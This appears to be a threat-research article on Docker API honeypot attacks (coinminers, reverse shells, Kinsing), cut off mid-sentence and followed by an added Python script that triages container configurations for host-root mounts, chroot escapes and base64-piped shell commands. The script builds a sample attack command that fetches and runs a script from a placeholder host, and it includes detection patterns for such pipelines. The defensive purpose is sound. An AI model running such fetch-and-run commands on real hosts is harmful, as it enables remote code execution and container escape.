Uptycs researchers identified ongoing malicious campaigns through our Docker honeypot targeting exposed Docker API.
The Uptycs Threat Research team has identified ongoing malicious campaigns through our Docker honeypot targeting the exposed Docker API port 2375. The attacks deploy crypto miners and reverse shells on the vulnerable servers using base64-encoded commands in the command line, built to evade defense mechanisms. This article briefly discusses three types of attacks that we observed recently in our Docker honeypot.
- Coinminer attacks
- Reverse shell attacks
- Kinsing malware attacks
Case 1 – Coinminer Attacks
The coinminer attack chain involves several shell scripts to drop malicious components via deployment of legitimate Docker images on the vulnerable servers (the servers exposed to Docker API).
Malicious Shell Scripts Involved In The Campaign
The threat actors tried to run the Alpine Docker image with the chroot command to gain full privileges on the vulnerable server host (a common misconfiguration). The attacker passed the curl utility as an argument to the Alpine image, which downloads and runs the malicious shell script (hash:
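The traits described above (a bind mount of the host root into a stock Alpine container, a chroot into that mount, and a base64-encoded command piped into a shell) are all visible in the container's own configuration, so they can be triaged from the Docker Engine inspect output without running the payload. The following is an added defender-side example, not Uptycs' code: it takes container records in the shape of the Engine API's inspect response (`Config.Cmd`, `HostConfig.Binds`, `HostConfig.Privileged`), flags each trait, and decodes any embedded base64 so an analyst sees the real command. The two container records are constructed sample data, and `example.invalid` is a placeholder domain, not an indicator from the campaign.

```python
"""
Added example (not Uptycs' code): triage Docker container records, in the
shape returned by the Engine API's container inspect endpoint, for the traits
the honeypot campaign relies on. All records below are constructed samples.
"""
import base64
import re

# Constructed payload: the kind of "download a script and run it" command the
# campaign hides behind base64. example.invalid is a placeholder domain.
_ENCODED_PAYLOAD = base64.b64encode(
    b"curl -s http://example.invalid/cronb.sh | sh"
).decode()

SAMPLE_CONTAINERS = [
    {   # constructed: attacker-style container, host / bound at /mnt, chroot, base64 pipe
        "Id": "aaaa1111",
        "Config": {
            "Image": "alpine",
            "Cmd": ["sh", "-c",
                    f"chroot /mnt sh -c 'echo {_ENCODED_PAYLOAD} | base64 -d | sh'"],
        },
        "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False},
    },
    {   # constructed: benign web server with a read-only content mount
        "Id": "bbbb2222",
        "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False},
    },
]

# Bind spec "host:container[:opts]" whose host side is the root filesystem.
HOST_ROOT_MOUNT = re.compile(r"^/:(/[^:]*)(?::.*)?$")
# "base64 -d | sh" style decode-and-execute pipelines.
B64_PIPE = re.compile(r"base64\s+(-d|--decode)\s*\|\s*(sh|bash)\b")
# Long runs of base64 alphabet characters worth trying to decode.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def host_root_mount(container):
    """Return the in-container path where the host's / is bound, or None."""
    for bind in container.get("HostConfig", {}).get("Binds") or []:
        match = HOST_ROOT_MOUNT.match(bind)
        if match:
            return match.group(1)
    return None


def decode_embedded_base64(cmdline):
    """Decode every long base64 blob in the command line that yields printable text."""
    decoded = []
    for blob in B64_BLOB.findall(cmdline):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64, or binary content: skip it
        if text.isprintable():
            decoded.append(text)
    return decoded


def triage(container):
    """Return the list of findings for one inspect-style container record."""
    findings = []
    cmdline = " ".join(container.get("Config", {}).get("Cmd") or [])
    mount = host_root_mount(container)
    if mount:
        findings.append(f"host root filesystem bound at {mount}")
        # chroot into the bound host root turns the container into a host shell
        if re.search(r"\bchroot\s+" + re.escape(mount) + r"\b", cmdline):
            findings.append("chroot into host root: container escape to host")
    if container.get("HostConfig", {}).get("Privileged"):
        findings.append("privileged container")
    if B64_PIPE.search(cmdline):
        findings.append("base64-decoded command piped to a shell")
    for text in decode_embedded_base64(cmdline):
        findings.append(f"decoded payload: {text}")
    return findings


def triage_all(containers):
    """Map container id -> findings, keeping only containers with at least one finding."""
    result = {}
    for container in containers:
        findings = triage(container)
        if findings:
            result[container["Id"]] = findings
    return result


if __name__ == "__main__":
    for cid, findings in triage_all(SAMPLE_CONTAINERS).items():
        print(cid)
        for finding in findings:
            print("  -", finding)
```

In a real deployment the records would come from `docker inspect` or the Engine API on the host being audited; the decoding step matters because the base64 wrapper is exactly what hides the curl-and-run command from naive command-line matching.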
Cronb.sh (the miner script)